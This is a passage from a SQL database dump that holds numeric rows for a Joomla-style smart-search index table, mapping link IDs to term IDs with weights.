(235, 51568, 1.00331),
(238, 51568, 1.00331),
(174, 51569, 1.02669),
(235, 51569, 1.02669),
(259, 51569, 1.02669),
(260, 51569, 1.02669),
(264, 51569, 1.02669),
(265, 51569, 1.02669),
(266, 51569, 1.02669),
(235, 51580, 0.91),
(262, 51580, 0.91),
(235, 51582, 0.23331),
(245, 51582, 0.23331),
(288, 51582, 0.23331),
(193, 65643, 0.23331),
(238, 65643, 0.23331),
(240, 65643, 0.23331),
(246, 65643, 0.23331),
(255, 65643, 0.23331),
(257, 65643, 0.23331),
(258, 65643, 0.23331),
(306, 65643, 0.23331),
(241, 65643, 0.46662),
(242, 65643, 0.46662),
(261, 65643, 0.46662),
(292, 65643, 0.46662),
(290, 65643, 0.93324),
(193, 65644, 0.91),
(241, 65644, 0.91),
(255, 65644, 0.91),
(258, 65644, 0.91),
(292, 65644, 0.91),
(193, 65645, 0.98),
(241, 65645, 0.98),
(255, 65645, 0.98),
(258, 65645, 0.98),
(292, 65645, 0.98),
(193, 65667, 1.00331),
(256, 65667, 1.00331),
(193, 65668, 0.91),
(240, 65668, 0.91),
(168, 65670, 0.88669),
(193, 65670, 0.88669),
(238, 65670, 0.88669),
(240, 65670, 0.88669),
(248, 65670, 0.88669),
(265, 65670, 0.88669),
(266, 65670, 0.88669),
(242, 65670, 1.77338),
(261, 65670, 2.66007),
(193, 65671, 1.02669),
(238, 65671, 1.02669),
(193, 65675, 0.91),
(240, 65675, 0.91),
(306, 65675, 0.91),
(238, 65685, 0.95669),
(174, 65685, 1.91338),
(193, 65685, 1.91338),
(272, 65685, 1.91338),
(280, 65685, 1.91338),
(193, 65697, 0.91),
(262, 65697, 0.91),
(174, 65699, 0.91),
(193, 65699, 0.91),
(241, 65699, 0.91),
(247, 65699, 0.91),
(193, 65701, 0.91),
(238, 65701, 0.91),
(237, 69130, 0.18669),
(240, 69130, 0.18669),
(241, 69130, 0.18669),
(244, 69130, 0.18669),
(254, 69130, 0.18669),
(255, 69130, 0.18669),
(256, 69130, 0.18669),
(257, 69130, 0.18669),
(258, 69130, 0.18669),
(259, 69130, 0.18669),
(260, 69130, 0.18669),
(261, 69130, 0.18669),
(262, 69130, 0.18669),
(263, 69130, 0.18669),
(264, 69130, 0.18669),
(265, 69130, 0.18669),
(266, 69130, 0.18669),
(267, 69130, 0.18669),
(268, 69130, 0.18669),
(269, 69130, 0.18669),
(270, 69130, 0.18669),
(272, 69130, 0.18669),
(273, 69130, 0.18669),
(274, 69130, 0.18669),
(280, 69130, 0.18669),
(288, 69130, 0.18669),
(292, 69130, 0.18669),
(301, 69130, 0.18669),
(304, 69130, 0.18669),
(305, 69130, 0.18669),
(275, 69130, 0.37338),
(237, 69131, 0.86331),
(241, 69131, 0.86331),
(254, 69131, 0.86331),
(255, 69131, 0.86331),
(256, 69131, 0.86331),
(257, 69131, 0.86331),
(258, 69131, 0.86331),
(259, 69131, 0.86331),
(260, 69131, 0.86331),
(261, 69131, 0.86331),
(262, 69131, 0.86331),
(263, 69131, 0.86331),
(264, 69131, 0.86331),
(265, 69131, 0.86331),
(266, 69131, 0.86331),
(267, 69131, 0.86331),
(268, 69131, 0.86331),
(270, 69131, 0.86331),
(272, 69131, 0.86331),
(273, 69131, 0.86331),
(274, 69131, 0.86331),
(275, 69131, 0.86331),
(280, 69131, 0.86331),
(288, 69131, 0.86331),
(292, 69131, 0.86331),
(301, 69131, 0.86331),
(304, 69131, 0.86331),
(305, 69131, 0.86331),
(237, 69132, 0.95669),
(241, 69132, 0.95669),
(254, 69132, 0.95669),
(255, 69132, 0.95669),
(256, 69132, 0.95669),
(257, 69132, 0.95669),
(258, 69132, 0.95669),
(259, 69132, 0.95669),
(260, 69132, 0.95669),
(261, 69132, 0.95669),
(262, 69132, 0.95669),
(263, 69132, 0.95669),
(264, 69132, 0.95669),
(265, 69132, 0.95669),
(266, 69132, 0.95669),
(267, 69132, 0.95669),
(268, 69132, 0.95669),
(270, 69132, 0.95669),
(272, 69132, 0.95669),
(273, 69132, 0.95669),
(274, 69132, 0.95669),
(275, 69132, 0.95669),
(280, 69132, 0.95669),
(288, 69132, 0.95669),
(292, 69132, 0.95669),
(301, 69132, 0.95669),
(304, 69132, 0.95669),
(305, 69132, 0.95669),
(237, 69188, 0.93331),
(254, 69188, 0.93331),
(244, 76259, 0.86331),
(254, 76259, 0.86331),
(254, 76268, 0.93331),
(258, 76268, 0.93331),
(304, 76268, 0.93331),
(257, 76275, 0.86331),
(258, 76275, 0.86331),
(261, 76275, 0.86331),
(275, 76275, 0.86331),
(288, 76275, 0.86331),
(254, 76275, 1.72662),
(254, 76277, 0.93331),
(257, 76277, 0.93331),
(168, 76288, 0.93331),
(254, 76288, 0.93331),
(241, 76289, 0.91),
(292, 76289, 0.91),
(254, 76289, 2.73),
(241, 76291, 1.00331),
(292, 76291, 1.00331),
(254, 76291, 2.00662),
(174, 76294, 0.91),
(238, 76294, 0.91),
(241, 76294, 0.91),
(254, 76294, 1.82),
(241, 76296, 0.98),
(254, 76296, 0.98),
(238, 76297, 0.95669),
(239, 76297, 0.95669),
(241, 76297, 0.95669),
(254, 76297, 0.95669),
(257, 76297, 0.95669),
(288, 76297, 0.95669),
(241, 76300, 0.91),
(254, 76300, 0.91),
(255, 76300, 0.91),
(238, 76309, 0.32669),
(254, 76309, 0.32669),
(236, 78331, 0.86331),
(248, 78331, 0.86331),
(239, 78331, 1.72662),
(236, 78337, 0.28),
(243, 78337, 0.28),
(306, 78337, 0.28),
(236, 78340, 0.88669),
(241, 78340, 0.88669),
(242, 78340, 0.88669),
(257, 78340, 0.88669),
(265, 78340, 0.88669),
(266, 78340, 0.88669),
(274, 78340, 0.88669),
(238, 78340, 1.77338),
(306, 78340, 1.77338),
(255, 78340, 6.20683),
(236, 78343, 0.91),
(248, 78343, 0.91),
(236, 78364, 0.88669),
(238, 78364, 0.88669),
(256, 78364, 0.88669),
(236, 78366, 0.93331),
(239, 78366, 0.93331),
(237, 84984, 0.84),
(240, 84984, 0.84),
(258, 84984, 0.84),
(305, 84984, 0.84),
(237, 84985, 0.93331),
(258, 84985, 0.93331),
(305, 84985, 0.93331),
(237, 84995, 0.91),
(265, 84995, 0.91),
(266, 84995, 0.91),
(237, 85002, 0.86331),
(240, 85002, 0.86331),
(239, 91104, 0.37331),
(292, 91104, 0.37331),
(306, 91104, 0.37331),
(255, 91104, 0.74662),
(238, 92869, 0.32669),
(247, 92869, 0.32669),
(249, 92869, 0.32669),
(248, 92869, 0.98007),
(238, 92872, 0.88669),
(240, 92872, 0.88669),
(241, 92872, 0.88669),
(246, 92872, 0.88669),
(261, 92872, 1.77338),
(244, 92882, 0.86331),
(272, 92882, 0.86331),
(274, 92882, 0.86331),
(280, 92882, 0.86331),
(306, 92882, 1.72662),
(238, 92882, 2.58993),
(257, 92882, 2.58993),
(238, 92886, 0.32669),
(269, 92886, 0.32669),
(178, 92914, 0.28),
(238, 92914, 0.28),
(263, 92927, 0.28),
(264, 92927, 0.28),
(238, 92927, 0.84),
(240, 92927, 1.12),
(306, 92927, 1.12),
(238, 92940, 1.05),
(270, 92940, 1.05),
(301, 92940, 1.05),
(238, 92946, 0.88669),
(243, 92946, 0.88669),
(168, 101349, 0.86331),
(239, 101349, 0.86331),
(240, 101349, 0.86331),
(290, 101349, 0.86331),
(239, 101354, 0.28),
(240, 101354, 0.28),
(275, 101371, 0.88669),
(239, 101371, 2.66007),
(239, 101375, 0.91),
(246, 101375, 0.91),
(239, 101382, 0.88669),
(257, 101382, 0.88669),
(239, 101387, 0.98),
(243, 101387, 0.98),
(265, 101387, 0.98),
(266, 101387, 0.98),
(174, 101396, 0.93331),
(239, 101396, 0.93331),
(239, 101399, 0.86331),
(240, 101399, 1.72662),
(272, 101399, 1.72662),
(280, 101399, 1.72662),
(239, 101401, 0.86331),
(292, 101401, 0.86331),
(262, 101401, 1.72662),
(239, 101405, 0.86331),
(273, 101405, 0.86331),
(239, 101410, 0.23331),
(240, 101410, 0.23331),
(239, 101411, 0.88669),
(240, 101411, 0.88669),
(239, 101412, 0.98),
(240, 101412, 0.98),
(292, 101434, 0.88669),
(305, 101434, 0.88669),
(239, 101434, 2.15339),
(242, 101434, 2.15339),
(240, 101434, 3.04008),
(239, 101435, 2.72),
(242, 101435, 2.72),
(240, 101435, 3.84),
(174, 101443, 0.23331),
(240, 101443, 0.23331),
(241, 101443, 0.23331),
(244, 101443, 0.23331),
(247, 101443, 0.23331),
(259, 101443, 0.23331),
(260, 101443, 0.23331),
(265, 101443, 0.23331),
(266, 101443, 0.23331),
(269, 101443, 0.23331),
(274, 101443, 0.23331),
(275, 101443, 0.23331),
(239, 101443, 0.46662),
(306, 101443, 0.46662),
(242, 101443, 1.39986),
(242, 102347, 0.23331),
(246, 102347, 0.23331),
(255, 102347, 0.23331),
(257, 102347, 0.23331),
(241, 102354, 0.86331),
(255, 102354, 0.86331),
(241, 102359, 0.95669),
(255, 102359, 0.95669),
(274, 102359, 0.95669),
(255, 102360, 1.00331),
(257, 102360, 1.00331),
(255, 102363, 0.93331),
(263, 102363, 0.93331),
(255, 102369, 0.98),
(262, 102369, 0.98),
(292, 102369, 0.98),
(306, 102369, 0.98),
(178, 102377, 1.00331),
(255, 102377, 1.00331),
(304, 102377, 1.00331),
(305, 102377, 4.01324),
(255, 102383, 0.86331),
(262, 102383, 0.86331),
(168, 102392, 0.86331),
(255, 102392, 0.86331),
(256, 108651, 1.00331),
(257, 108651, 1.00331),
(256, 108652, 0.98),
(257, 108652, 0.98),
(256, 108655, 0.91),
(257, 108655, 0.91),
(247, 110626, 0.32669),
(257, 110626, 0.32669),
(267, 110626, 0.32669),
(178, 110631, 0.86331),
(248, 110631, 0.86331),
(263, 110631, 0.86331),
(306, 110631, 0.86331),
(257, 110631, 1.72662),
(247, 110645, 0.95669),
(257, 110645, 0.95669),
(270, 110645, 0.95669),
(301, 110645, 0.95669),
(306, 110645, 1.91338),
(247, 110646, 1.05),
(257, 110646, 1.05),
(306, 110646, 1.05),
(241, 110650, 0.91),
(257, 110650, 0.91),
(263, 110650, 0.91),
(295, 110650, 0.91),
(305, 110650, 0.91),
(168, 110650, 1.82),
(257, 110655, 0.98),
(262, 110655, 1.96),
(248, 110659, 0.95669),
(257, 110659, 0.95669),
(263, 110659, 0.95669),
(288, 110659, 0.95669),
(305, 110659, 0.95669),
(174, 110667, 1.14331),
(257, 110667, 1.14331),
(263, 110667, 1.14331),
(240, 114769, 0.86331),
(241, 114769, 0.86331),
(244, 114769, 0.86331),
(273, 114769, 0.86331),
(304, 114769, 0.86331),
(240, 114770, 0.93331),
(241, 114770, 0.93331),
(273, 114770, 0.93331),
(304, 114770, 0.93331),
(174, 114776, 0.91),
(240, 114776, 0.91),
(241, 114776, 0.91),
(247, 114776, 0.91),
(264, 114776, 0.91),
(274, 114776, 0.91),
(306, 114776, 0.91),
(259, 114776, 1.82),
(260, 114776, 1.82),
(168, 115625, 0.91),
(244, 115625, 0.91),
(256, 115625, 0.91),
(168, 115629, 0.88669),
(256, 115629, 0.88669),
(265, 115629, 0.88669),
(266, 115629, 0.88669),
(256, 115631, 0.86331),
(267, 115631, 0.86331),
(272, 115631, 0.86331),
(280, 115631, 0.86331),
(240, 148308, 0.91),
(269, 148308, 0.91),
(240, 148310, 0.93331),
(259, 148310, 0.93331),
(260, 148310, 0.93331),
(240, 148329, 0.86331),
(275, 148329, 0.86331),
(240, 148395, 0.23331),
(268, 148395, 0.23331),
(240, 148398, 0.88669),
(259, 148398, 0.88669),
(260, 148398, 0.88669),
(239, 150863, 1.00331),
(242, 150863, 1.00331),
(243, 150863, 1.00331),
(242, 150864, 0.88669),
(243, 150864, 0.88669),
(258, 150864, 0.88669),
(261, 150864, 0.88669),
(274, 150864, 0.88669),
(264, 150864, 1.77338),
(242, 150865, 0.95669),
(243, 150865, 0.95669),
(261, 150865, 0.95669),
(274, 150865, 0.95669),
(264, 150865, 1.91338),
(242, 150866, 0.91),
(242, 150867, 1.21331),
(242, 150868, 0.93331),
(242, 150869, 1.23669),
(242, 150870, 1.05),
(242, 150871, 1.12),
(242, 150872, 0.98),
(242, 150873, 1.12),
(238, 150874, 0.91),
(242, 150874, 0.91),
(242, 150875, 1.12),
(242, 150876, 1.00331),
(242, 150877, 1.07331),
(242, 150878, 0.84),
(274, 150878, 0.84),
(242, 150879, 1.00331),
(242, 150880, 0.28),
(249, 150880, 0.28),
(242, 150881, 1.02669),
(242, 150882, 1.12),
(242, 150883, 0.93331),
(255, 150883, 0.93331),
(242, 150884, 1.07331),
(242, 150885, 0.98),
(242, 150886, 1.09669),
(242, 150887, 0.84),
(242, 150888, 1.07331),
(242, 150889, 0.86331),
(242, 150890, 0.98),
(242, 150891, 0.86331),
(242, 150892, 1.07331),
(242, 150893, 0.91),
(242, 150894, 1.05),
(242, 150895, 0.95669),
(174, 150896, 0.86331),
(240, 150896, 0.86331),
(242, 150896, 0.86331),
(292, 150896, 0.86331),
(242, 150897, 0.98),
(242, 150898, 1.07331),
(239, 150899, 0.91),
(242, 150899, 0.91),
(242, 150900, 0.81669),
(245, 150900, 0.81669),
(242, 150901, 0.91),
(242, 150902, 0.91),
(242, 150903, 0.98),
(242, 150904, 0.93331),
(242, 150905, 0.95669),
(242, 150906, 1.07331),
(242, 150907, 0.18669),
(254, 150907, 0.37338),
(242, 150908, 0.91),
(242, 150909, 1.14331),
(242, 150910, 1.02669),
(242, 150911, 1.14331),
(241, 150912, 0.86331),
(242, 150912, 0.86331),
(242, 150913, 0.93331),
(242, 150914, 0.98),
(265, 150914, 0.98),
(266, 150914, 0.98),
(255, 150914, 4.9),
(254, 150915, 0.86331),
(242, 150915, 1.72662),
(242, 150916, 2.00662),
(242, 150917, 1.09669),
(242, 150918, 1.96),
(242, 150919, 0.88669),
(242, 150920, 0.95669),
(242, 150921, 1.07331),
(242, 150922, 1.00331),
(299, 150923, 1.00331),
(242, 150923, 2.00662),
(242, 150924, 0.95669),
(242, 150925, 1.05),
(242, 150926, 0.91),
(269, 150926, 0.91),
(242, 150927, 1.14331),
(248, 150928, 0.91),
(263, 150928, 0.91),
(242, 150928, 1.82),
(242, 150929, 1.23669),
(242, 150930, 1.02669),
(242, 150931, 0.93331),
(242, 150932, 1.05),
(242, 150933, 0.98),
(242, 150934, 1.19),
(242, 150935, 0.91),
(242, 150936, 1.02669),
(242, 150937, 0.95669),
(256, 150937, 0.95669),
(242, 150938, 1.02669),
(193, 150939, 0.91),
(242, 150939, 0.91),
(249, 150939, 0.91),
(261, 150939, 0.91),
(242, 150940, 1.00331),
(242, 150941, 0.88669),
(242, 150942, 1.02669),
(242, 150943, 0.95669),
(236, 150943, 1.91338),
(242, 150944, 1.14331),
(242, 150945, 0.95669),
(242, 150946, 1.00331),
(242, 150947, 0.98),
(242, 150948, 0.98),
(267, 150948, 0.98),
(242, 150949, 0.88669),
(242, 150950, 0.98),
(242, 150951, 0.91),
(242, 150952, 1.00331),
(242, 150953, 0.88669),
(305, 150953, 0.88669),
(242, 150954, 0.95669),
(242, 150955, 0.86331),
(248, 150955, 0.86331),
(299, 150955, 0.86331),
(304, 150955, 0.86331),
(242, 150956, 1.09669),
(242, 150957, 1.02669),
(242, 150958, 1.02669),
(242, 150959, 1.14331),
(242, 150960, 0.98),
(242, 150961, 1.07331),
(242, 150962, 1.02669),
(252, 150962, 1.02669),
(242, 150963, 1.12),
(242, 150964, 0.91),
(242, 150965, 1.05),
(242, 150966, 0.91),
(242, 150967, 0.98),
(168, 150968, 0.23331),
(241, 150968, 0.23331),
(242, 150968, 0.23331),
(306, 150968, 0.23331),
(242, 150969, 0.88669),
(242, 150970, 1.00331),
(242, 150971, 0.88669),
(243, 150971, 0.88669),
(247, 150971, 0.88669),
(248, 150971, 0.88669),
(265, 150971, 1.77338),
(266, 150971, 1.77338),
(242, 150972, 0.98),
(233, 150973, 0.88669),
(242, 150973, 0.88669),
(242, 150974, 0.93331),
(242, 150975, 1.00331),
(242, 150976, 1.07331),
(242, 150977, 1.05),
(242, 150978, 1.14331),
(242, 150980, 0.88669),
(242, 150981, 1.07331),
(242, 150982, 0.86331),
(262, 150982, 0.86331),
(242, 150983, 0.93331),
(242, 150984, 1.02669),
(242, 150985, 0.93331),
(242, 150986, 1.05),
(242, 150987, 0.93331),
(242, 150988, 1.07331),
(239, 150989, 0.32669),
(248, 150989, 0.32669),
(242, 150989, 0.65338),
(249, 150989, 0.65338),
(242, 150990, 1.02669),
(242, 150991, 1.12),
(242, 150992, 0.98),
(242, 150993, 1.09669),
(242, 150994, 0.32669),
(267, 150994, 0.32669),
(298, 150994, 0.32669),
(304, 150994, 0.32669),
(308, 150994, 0.32669),
(243, 150994, 0.65338),
(262, 150994, 0.65338),
(242, 150995, 0.95669),
(262, 150995, 0.95669),
(242, 150996, 1.02669),
(242, 150997, 1.96),
(242, 150998, 1.16669),
(242, 150999, 1.05),
(174, 151000, 0.93331),
(269, 151000, 0.93331),
(274, 151000, 0.93331),
(306, 151000, 0.93331),
(242, 151000, 3.73324),
(242, 151001, 1.07331),
(242, 151002, 1.02669),
(242, 151003, 1.09669),
(242, 151004, 1.14331),
(242, 151005, 0.14),
(242, 151006, 0.88669),
(242, 151007, 1.02669),
(242, 151008, 0.37331),
(242, 151009, 0.98),
(242, 151010, 1.05),
(168, 158012, 0.91),
(243, 158012, 0.91),
(248, 158012, 0.91),
(263, 158012, 0.91),
(288, 158012, 0.91),
(305, 158012, 0.91),
(243, 158013, 1.00331),
(248, 158013, 1.00331),
(263, 158013, 1.00331),
(288, 158013, 1.00331),
(305, 158013, 1.00331),
(243, 158020, 0.86331),
(267, 158020, 0.86331),
(174, 158022, 0.91),
(243, 158022, 0.91),
(249, 158022, 0.91),
(263, 158022, 0.91),
(275, 158022, 0.91),
(305, 158022, 0.91),
(243, 158040, 0.98),
(265, 158040, 0.98),
(266, 158040, 0.98),
(288, 158040, 0.98),
(247, 159781, 0.84),
(268, 159781, 0.84),
(305, 159781, 0.84),
(241, 159781, 1.68),
(241, 159792, 0.88669),
(264, 159792, 0.88669),
(241, 159796, 0.91),
(248, 159796, 0.91),
(241, 159809, 0.98),
(267, 159809, 0.98),
(306, 159809, 0.98),
(244, 159815, 0.86331),
(258, 159815, 0.86331),
(288, 159815, 0.86331),
(292, 159815, 1.72662),
(241, 159815, 3.45324),
(241, 159825, 0.18669),
(263, 159825, 0.18669),
(306, 159825, 0.18669),
(241, 159890, 0.18669),
(268, 159890, 0.18669),
(249, 163738, 0.18669),
(258, 163738, 0.18669),
(262, 163738, 0.18669),
(265, 163738, 0.18669),
(266, 163738, 0.18669),
(288, 163738, 0.18669),
(292, 163738, 0.18669),
(269, 163738, 0.37338),
(259, 173895, 0.23331),
(260, 173895, 0.23331),
(263, 173895, 0.23331),
(269, 173895, 0.46662),
(259, 173896, 0.98),
(260, 173896, 0.98),
(259, 173897, 1.19),
(260, 173897, 1.19),
(259, 173898, 0.95669),
(260, 173898, 0.95669),
(259, 173899, 1.05),
(260, 173899, 1.05),
(259, 173900, 1.12),
(260, 173900, 1.12),
(259, 173901, 1.09669),
(260, 173901, 1.09669),
(259, 173902, 1.02669),
(260, 173902, 1.02669),
(259, 173903, 1.07331),
(260, 173903, 1.07331),
(259, 173904, 1.16669),
(260, 173904, 1.16669),
(259, 173905, 0.88669),
(260, 173905, 0.88669),
(259, 173906, 0.98),
(260, 173906, 0.98),
(259, 173907, 0.86331),
(260, 173907, 0.86331),
(259, 173908, 0.93331),
(260, 173908, 0.93331),
(174, 173909, 0.93331),
(259, 173909, 0.93331),
(260, 173909, 0.93331),
(259, 173910, 1.16669),
(260, 173910, 1.16669),
(259, 173911, 0.91),
(260, 173911, 0.91),
(259, 173912, 1.00331),
(260, 173912, 1.00331),
(259, 173913, 0.93331),
(260, 173913, 0.93331),
(259, 173914, 1.02669),
(260, 173914, 1.02669),
(259, 173915, 1.12),
(260, 173915, 1.12),
(259, 173916, 1.09669),
(260, 173916, 1.09669),
(261, 176115, 0.86331),
(263, 176115, 0.86331),
(274, 176115, 0.86331),
(174, 176127, 1.05),
(261, 176127, 2.1),
(246, 176139, 0.95669),
(261, 176139, 1.91338),
(247, 176146, 0.93331),
(261, 176146, 0.93331),
(247, 176147, 1.02669),
(261, 176147, 1.02669),
(261, 176165, 0.37331),
(269, 176165, 0.37331),
(274, 176168, 0.42),
(261, 176168, 0.84),
(261, 176169, 1.02669),
(274, 176169, 1.02669),
(168, 176233, 0.18669),
(178, 176233, 0.18669),
(261, 176233, 0.37338),
(178, 177262, 0.46669),
(244, 177262, 0.46669),
(248, 177262, 0.46669),
(178, 177263, 1.00331),
(244, 177263, 1.00331),
(248, 178938, 0.28),
(249, 178938, 0.96),
(245, 178938, 1.12),
(248, 178946, 2.66019),
(246, 178946, 2.98688),
(245, 178946, 3.31357),
(245, 178955, 0.32669),
(247, 178955, 0.32669),
(178, 186160, 0.18669),
(288, 186160, 0.18669),
(262, 186160, 0.37338),
(160, 189293, 8.93019),
(161, 189832, 0.37331),
(161, 189833, 1.14331),
(161, 189834, 1.23669),
(161, 189835, 1.05),
(161, 189836, 1.26),
(161, 189837, 0.95669),
(161, 189838, 1.02669),
(161, 189839, 1.12),
(161, 189840, 1.00331),
(161, 189841, 1.21331),
(161, 189842, 1.02669),
(161, 189843, 1.19),
(161, 189844, 1.09669),
(161, 189845, 1.4),
(161, 189846, 1.02669),
(161, 189847, 1.14331),
(161, 189848, 0.98),
(161, 189849, 1.19),
(161, 189850, 1.00331),
(161, 189851, 1.07331),
(161, 189852, 0.98),
(161, 189853, 1.09669),
(161, 189854, 0.93331),
(161, 189855, 1.12),
(161, 189856, 0.86331),
(161, 189857, 0.93331),
(161, 189858, 1.05),
(161, 189859, 1.14331),
(161, 189860, 0.93331),
(161, 189861, 1.12),
(161, 189862, 0.98),
(161, 189863, 1.16669),
(161, 189864, 1.09669),
(161, 189865, 1.21331),
(161, 189866, 1.05),
(161, 189867, 1.16669),
(161, 189868, 1.12),
(161, 189869, 1.4),
(168, 191846, 0.88669),
(193, 191846, 0.88669),
(174, 191871, 0.98),
(193, 191871, 1.96),
(193, 191878, 1.00331),
(247, 191878, 1.00331),
(246, 193056, 0.91),
(269, 193056, 0.91),
(246, 193085, 0.91),
(249, 193085, 0.91),
(168, 198323, 1.07331),
(168, 198324, 0.37331),
(249, 198324, 0.37331),
(168, 198325, 0.98),
(168, 198326, 1.16669),
(168, 198327, 0.28),
(168, 198328, 0.91),
(168, 198329, 1.21331),
(168, 198330, 0.88669),
(168, 198331, 1.09669),
(168, 198332, 1.00331),
(168, 198333, 0.98),
(168, 198334, 1.02669),
(168, 198335, 1.00331),
(168, 198336, 1.09669),
(168, 198337, 0.98),
(268, 198338, 0.88669),
(168, 198338, 1.77338),
(168, 198339, 1.96),
(168, 198340, 1.00331),
(168, 198341, 0.98),
(168, 198342, 0.95669),
(264, 198342, 0.95669),
(168, 198343, 1.16669),
(168, 198344, 0.91),
(168, 198345, 0.98),
(168, 198346, 2.00662),
(168, 198347, 0.95669),
(168, 198348, 1.07331),
(168, 198349, 0.93331),
(168, 198350, 1.00331),
(168, 198351, 0.98),
(168, 198352, 0.95669),
(168, 198380, 0.86331),
(168, 198381, 0.98),
(174, 201663, 0.81669),
(178, 201663, 0.81669),
(248, 201663, 0.81669),
(263, 201663, 0.81669),
(306, 201663, 0.81669),
(269, 201663, 1.63338),
(174, 201672, 1.00331),
(178, 201672, 1.00331),
(174, 215985, 0.93331),
(174, 215986, 0.91),
(174, 215987, 1.00331),
(174, 215988, 0.91),
(174, 215989, 1.05),
(174, 215990, 0.18669),
(174, 215991, 0.98),
(174, 215992, 1.09669),
(174, 215993, 1.14331),
(174, 215994, 1.00331),
(174, 215995, 0.95669),
(174, 215996, 1.07331),
(174, 215997, 1.05),
(174, 215998, 1.00331),
(174, 215999, 1.00331),
(174, 216000, 1.07331),
(174, 216001, 1.28331),
(174, 216002, 0.88669),
(174, 216003, 1.00331),
(174, 216004, 0.91),
(174, 216005, 1.02669),
(174, 216006, 1.02669),
(174, 216007, 1.07331),
(174, 216008, 0.98),
(174, 216009, 1.07331),
(174, 216010, 0.93331),
(174, 216011, 1.02669),
(174, 216012, 0.93331),
(174, 216013, 0.91),
(174, 216014, 1.12),
(174, 216015, 0.88669),
(306, 216015, 0.88669),
(174, 216016, 0.98),
(174, 216017, 1.00331),
(174, 216018, 1.09669),
(174, 216019, 0.93331),
(174, 216020, 1.05),
(272, 216021, 1.02669),
(280, 216021, 1.02669),
(174, 216021, 2.05338),
(174, 216022, 1.05),
(174, 216023, 0.95669),
(174, 216024, 1.09669),
(174, 216025, 1.05),
(174, 216026, 0.93331),
(174, 216027, 1.05),
(174, 216028, 1.16669),
(174, 216029, 0.95669),
(174, 216030, 1.05),
(174, 216031, 0.91),
(174, 216032, 1.05),
(174, 216033, 1.12),
(174, 216034, 0.91),
(174, 216035, 1.00331),
(174, 216036, 1.07331),
(174, 216037, 1.12),
(174, 216038, 1.02669),
(174, 216039, 1.00331),
(174, 216040, 1.12),
(174, 216041, 1.86662),
(174, 216042, 2.1),
(174, 216043, 0.91),
(288, 216043, 0.91),
(174, 216044, 1.00331),
(174, 216045, 0.88669),
(174, 216046, 0.98),
(174, 216047, 0.93331),
(174, 216048, 1.05),
(174, 216049, 1.00331),
(174, 216050, 1.07331),
(174, 216051, 0.95669),
(174, 216052, 1.07331),
(174, 216053, 0.98),
(174, 216054, 1.14331),
(174, 216055, 1.02669),
(174, 216056, 0.98),
(174, 216057, 0.91),
(174, 216058, 1.00331),
(174, 216059, 1.12),
(174, 216060, 0.93331),
(174, 216061, 1.07331),
(174, 216062, 1.26),
(174, 216063, 0.93331),
(174, 216064, 1.05),
(174, 216065, 0.91),
(174, 216066, 1.12),
(262, 217900, 0.88669),
(265, 217900, 1.77338),
(266, 217900, 1.77338),
(262, 217901, 0.95669),
(265, 217901, 1.91338),
(266, 217901, 1.91338),
(262, 217934, 0.93331),
(267, 217934, 0.93331),
(178, 223079, 0.98),
(178, 223080, 1.00331),
(178, 223081, 1.07331),
(269, 223082, 0.84),
(178, 223082, 1.68),
(306, 223082, 1.68),
(178, 223083, 1.91338),
(178, 223084, 0.88669),
(178, 223085, 0.95669),
(178, 223086, 0.88669),
(178, 223087, 0.95669),
(178, 223088, 0.95669),
(178, 223089, 0.93331),
(178, 223090, 1.14331),
(178, 223091, 1.02669),
(178, 223092, 1.12),
(178, 223093, 0.84),
(178, 223094, 0.95669),
(178, 223095, 1.05),
(178, 223096, 1.21331),
(178, 223097, 0.86331),
(178, 223098, 0.98),
(178, 223099, 1.72662),
(178, 223100, 1.00331),
(178, 223101, 1.16669),
(178, 223102, 0.91),
(178, 223103, 0.95669),
(178, 223104, 1.02669),
(178, 223105, 1.14331),
(178, 223106, 0.28),
(178, 223107, 0.91),
(178, 223108, 1.00331),
(178, 223109, 1.02669),
(178, 223110, 1.14331),
(178, 223111, 1.02669),
(178, 223112, 1.19),
(178, 223113, 0.93331),
(178, 223114, 1.00331),
(178, 223115, 0.98),
(178, 223116, 1.12),
(178, 223117, 1.14331),
(178, 223118, 0.86331),
(178, 223119, 0.95669),
(178, 223120, 0.88669),
(178, 223121, 1.00331),
(178, 223122, 0.98),
(178, 223123, 0.93331),
(269, 223123, 0.93331),
(178, 223124, 1.05),
(306, 223125, 0.88669),
(178, 223125, 2.66007),
(178, 223126, 0.98),
(306, 223127, 0.98),
(178, 223127, 1.96),
(178, 223128, 0.88669),
(178, 223129, 1.16669),
(178, 223130, 1.14331),
(178, 223131, 1.26),
(178, 223132, 0.88669);
INSERT INTO `y57u5_finder_links_termsf` (`link_id`, `term_id`, `weight`) VALUES
(178, 223133, 1.00331),
(178, 223134, 1.00331),
(178, 223135, 1.07331),
(178, 223136, 0.98),
(178, 223137, 1.07331),
(178, 223138, 0.88669),
(178, 223139, 0.98),
(178, 223140, 0.88669),
(178, 223141, 0.98),
(178, 223142, 0.95669),
(178, 223143, 1.02669),
(178, 223144, 0.98),
(178, 223145, 0.98),
(178, 223146, 0.98),
(269, 223146, 1.96),
(178, 223147, 1.09669),
(178, 223148, 0.98),
(178, 223149, 1.19),
(178, 223150, 1.00331),
(178, 223151, 0.95669),
(178, 223152, 1.07331),
(178, 223153, 0.18669),
(178, 223154, 0.91),
(178, 223155, 1.00331),
(178, 223156, 1.02669),
(178, 223157, 0.98),
(178, 223158, 1.07331),
(178, 223159, 1.12),
(178, 223160, 1.07331),
(178, 223161, 0.95669),
(178, 223162, 1.21331),
(178, 223163, 0.28),
(178, 223164, 0.93331),
(178, 223165, 1.19),
(178, 223166, 1.19),
(178, 223167, 1.26),
(178, 223168, 1.07331),
(178, 223169, 1.12),
(178, 223170, 0.95669),
(178, 223171, 1.14331),
(178, 223172, 0.91),
(178, 223173, 0.95669),
(178, 223174, 0.88669),
(178, 223175, 1.00331),
(178, 223176, 0.88669),
(178, 223177, 1.00331),
(274, 223178, 0.18669),
(306, 223178, 0.18669),
(178, 223178, 1.49352),
(178, 223179, 0.88669),
(178, 223180, 1.05),
(178, 223181, 1.02669),
(178, 223182, 1.12),
(178, 223183, 0.88669),
(306, 223183, 0.88669),
(178, 223184, 1.02669),
(178, 223185, 0.88669),
(178, 223186, 0.95669),
(178, 223187, 0.93331),
(178, 223188, 1.05),
(178, 223189, 0.93331),
(178, 223190, 1.02669),
(178, 223191, 0.93331),
(178, 223192, 1.02669),
(178, 223193, 1.28331),
(178, 223194, 1.35331),
(178, 223195, 0.56),
(178, 223196, 0.91),
(178, 223197, 0.98),
(178, 223198, 0.91),
(178, 223199, 1.02669),
(178, 223200, 0.91),
(178, 223201, 1.00331),
(178, 223202, 0.91),
(178, 223203, 1.02669),
